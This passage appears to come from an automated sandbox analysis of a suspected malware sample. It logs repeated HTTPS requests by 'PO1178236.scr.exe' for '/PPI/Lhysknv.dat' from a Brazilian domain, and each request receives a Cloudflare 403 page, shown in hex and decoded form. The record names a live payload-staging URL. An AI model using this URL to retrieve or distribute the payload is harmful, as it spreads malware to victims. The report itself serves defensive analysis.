6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1a6ce9f43d6</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:36:28 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 61 36 63 65 39 66 34 33 64 36 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 34 4e 79 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1a6ce9f43d6',t:'MTczNjQwODE4Ny4wMDAwMDA=
        2025-01-09 07:36:28 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        51192.168.2.949759188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:28 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:28 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:28 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:43 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4wtAO0wHkF3OUwC1FPN0JB5Y3%2F7Qj0tQFr1EGxZuI%2Fjcxja0ss4wjfWg4WGXMZPH0YmTNrqE%2BIXCq4ywV%2FPDH8IqzyDTRSwZ6NeeFCua20G6e0JZEchLXCxJSiy7iyCiBdVa17hc28YyCP8v"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1aa9e888c23-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2037&min_rtt=2027&rtt_var=781&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1381921&cwnd=227&unsent_bytes=0&cid=7e1958ff15c187cd&ts=148&x=0"
        2025-01-09 07:36:28 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:28 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:36:28 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:36:28 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 61 61 39 65 38 38 38 63 32 33 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1aa9e888c23</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:36:28 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 61 61 39 65 38 38 38 63 32 33 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 34 4f 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1aa9e888c23',t:'MTczNjQwODE4OC4wMDAwMDA='};var
        2025-01-09 07:36:28 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        52192.168.2.949760188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:29 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:29 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:29 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:44 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M1Grb%2Bslb%2BnldRUTawUZQ0YVmYPBelGquTqOUuHcMT%2FFwPT6JBAgfqFiKusj9ppdnochfQ7qaMse50XXWMIgIQp3NxpkhlTi%2Btxbz%2FWzTkwNHkvmlV6UBfTVXJrtYMCt00qSqIoai%2Bq5Gcw2"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1ae4e5642ad-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1682&rtt_var=635&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1736028&cwnd=242&unsent_bytes=0&cid=fd3fb67b41ff6462&ts=135&x=0"
        2025-01-09 07:36:29 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:29 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:36:29 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:36:29 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 61 65 34 65 35 36 34 32 61 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1ae4e5642ad</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:36:29 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 61 65 34 65 35 36 34 32 61 64 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 34 4f 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1ae4e5642ad',t:'MTczNjQwODE4OS4wMDAwMDA='}
        2025-01-09 07:36:29 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        53192.168.2.949761188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:29 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:29 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:29 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:44 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GuFsGVOGsxA1TRE7QIwWZEqKF9NKOwbvZ3Ykk%2Bx7auhTUU7VgFg6wVZmrSjq%2Bpwd%2BIu13zSX9IgsuB1lkj%2Ba2di48hEWduU6lpUuSKZiCfWitmFcA3Kf7nLouz7BKTr%2F8kAoQ1GDdlTQ4eqA"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1b23b89de98-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1556&rtt_var=598&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1809169&cwnd=212&unsent_bytes=0&cid=a0489213f3b096dd&ts=143&x=0"
        2025-01-09 07:36:29 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:29 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:36:29 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:29 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 62 32 33 62 38 39 64 65 39 38 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1b23b89de98</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:29 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 62 32 33 62 38 39 64 65 39 38 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 34 4f 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1b23b89de98',t:'MTczNjQwODE4OS4wMDAwMDA='};v
        2025-01-09 07:36:29 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        54192.168.2.949762188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:30 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:30 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:30 GMT
